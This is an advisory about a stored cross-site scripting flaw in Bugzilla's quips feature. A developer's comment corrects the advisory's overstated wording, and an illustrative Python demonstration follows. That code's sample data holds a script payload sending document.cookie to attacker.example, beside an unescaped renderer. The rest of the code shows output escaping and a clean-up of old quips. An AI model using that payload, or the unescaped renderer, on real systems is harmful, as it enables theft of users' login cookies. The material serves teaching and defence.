A cross-site scripting vulnerability has been reported for Bugzilla, a
web-based bug tracking system. Bugzilla does not properly sanitize
any input submitted by users. As a result, it is possible for a
remote attacker to create a malicious link containing script code
which will be executed in the browser of a legitimate user, in the
context of the website running Bugzilla. This issue may be exploited
to steal cookie-based authentication credentials from legitimate users
of the website running the vulnerable software.
This vulnerability only affects users who have the 'quips' feature
enabled and who upgraded from version 2.10.
Posted Jan 9, 2003 9:44 UTC (Thu) by gerv (subscriber, #3376)
Debian rewrote the original Bugzilla advisory so it is now seriously misleading. The sentence "Bugzilla does not properly sanitize any input submitted by users." is absolutely not correct. Bugzilla takes great care to sanitise user input. A better sentence might be:
"For a period up to two years ago, Bugzilla did not properly sanitize quips submitted by users."
At the time, this was a feature, not a bug, but the use of HTML in quips had to be restricted due to abuse. However, we didn't write code to clean up any quips already in the database. So, if you get hit with a cross-site scripting attack, then the malicious party must have added it to your Bugzilla two years ago.
The chance of this vulnerability actually affecting anyone is minuscule.
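The two sides of the issue above, stored markup in old quips and the missing escape when a quip is rendered, in an added example that is not Bugzilla's own code (Bugzilla is written in Perl; this is Python so the behaviour can be demonstrated stand-alone). The `quips(quipid, quip)` table, the sample quips and the cookie-stealing payload are all constructed for illustration and do not reproduce the real Bugzilla schema or any real attack. It shows the pre-fix rendering that interpolates a stored quip verbatim, the fix on the output side (HTML-escape on display, which protects every quip regardless of when it was stored), and the one-time clean-up of legacy rows that the comment above says was never written:

```python
import html
import re
import sqlite3

# Constructed sample quips. The first two are benign; the third is a
# hypothetical stored-XSS payload of the kind an attacker could have saved
# while quips were still allowed to contain raw HTML.
SAMPLE_QUIPS = [
    "It is not a bug, it is a feature.",
    "Some <b>bold</b> opinions about <i>priorities</i>.",
    '<script>new Image().src="http://attacker.example/?c="+document.cookie</script>',
]

# Matches anything that looks like an HTML tag, including an unterminated one.
TAG_RE = re.compile(r"<[^>]*>?", re.DOTALL)


def render_quip_unsafe(quip: str) -> str:
    """Pre-fix behaviour: the stored quip is interpolated into the page
    verbatim, so any markup it contains runs in the viewer's browser."""
    return f'<div class="quip">{quip}</div>'


def render_quip_safe(quip: str) -> str:
    """Output-side fix: escape <, >, &, ' and " so the quip is shown as text
    no matter what was stored or when it was stored."""
    return f'<div class="quip">{html.escape(quip, quote=True)}</div>'


def contains_markup(quip: str) -> bool:
    """Flag quips that still carry tags, for auditing an existing database."""
    return TAG_RE.search(quip) is not None


def strip_markup(quip: str) -> str:
    """Remove tags from a legacy quip. Output escaping is still required
    afterwards; this only cleans what was stored before HTML was disallowed."""
    return TAG_RE.sub("", quip)


def clean_existing_quips(conn: sqlite3.Connection) -> int:
    """One-time clean-up of quips stored before HTML was disallowed.
    Assumes a hypothetical table quips(quipid INTEGER, quip TEXT), not the
    real Bugzilla schema. Returns the number of rows rewritten."""
    changed = 0
    for quipid, quip in conn.execute("SELECT quipid, quip FROM quips").fetchall():
        if contains_markup(quip):
            conn.execute("UPDATE quips SET quip = ? WHERE quipid = ?",
                         (strip_markup(quip), quipid))
            changed += 1
    conn.commit()
    return changed


def make_sample_db() -> sqlite3.Connection:
    """Build an in-memory database holding the constructed sample quips."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE quips (quipid INTEGER PRIMARY KEY, quip TEXT NOT NULL)")
    conn.executemany("INSERT INTO quips (quip) VALUES (?)",
                     [(q,) for q in SAMPLE_QUIPS])
    conn.commit()
    return conn


if __name__ == "__main__":
    conn = make_sample_db()
    for (quip,) in conn.execute("SELECT quip FROM quips"):
        print("unsafe:", render_quip_unsafe(quip))
        print("safe:  ", render_quip_safe(quip))
    print("legacy quips cleaned:", clean_existing_quips(conn))
```

Escaping on output is the fix that actually closes the hole, because it does not depend on trusting the history of the database; the clean-up pass is only there to remove the markup that was legitimately stored while HTML quips were still a feature, and a rough tag-stripping regex like the one above is acceptable for that audit but must never be relied on as the sole defence.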